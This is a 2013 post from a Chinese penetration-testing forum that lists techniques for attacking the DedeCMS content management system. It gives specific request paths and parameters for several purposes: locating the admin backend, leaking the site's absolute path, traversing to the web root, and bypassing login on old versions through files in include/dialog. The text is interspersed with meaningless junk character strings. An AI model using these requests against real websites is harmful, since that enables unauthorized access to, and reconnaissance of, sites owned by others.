找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
返回列表 发新帖
查看: 2517|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
' ^% ]4 W. {- i9 ^+ \# G7 S8 A
* Y, C3 D1 h7 f( a3 y员帐号,新版本的就直接转向了后台.* s7 `0 ^0 w4 p! @

% l6 o) e" U5 ~) f5 I6 A2.include/dialog/config.php会爆出后台管理路径# O9 y# l/ S/ w/ P0 X. V! ~+ R

5 a1 J. W- q5 F7 I: _+ @3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录+ Q2 C9 M) {" k
. T3 x( l+ I6 p' ~4 Q6 Y7 @
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.7 l. o9 O2 `/ c1 o% p- |
# \- F1 t. \% L3 }2 M& J$ Y1 t
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
; v1 U7 l# S2 l- ]% i9 z/ _8 Q( |$ p+ I7 a- v! i
到根目录去.不过这些版本的访问地址有些不同.3 z7 J' |+ U7 i, t9 O9 b( F7 S
地址为require/dialog/select_soft.php?activepath=/././././././././
$ i. Q7 [& ]: o* M6 G& [1 ^/ X0 e* T
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
4 h- |/ b. A: R8 i2 ^存在相同问题的文件还有$ E2 D: c- u6 Q9 p9 C' R
include\dialog\select_images.php
# e& K! M( o9 f/ t1 Cinclude\dialog\select_media.php3 x5 t6 p! r  A
include\dialog\select_templets.php​
3 s! f7 f* w3 n$ t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表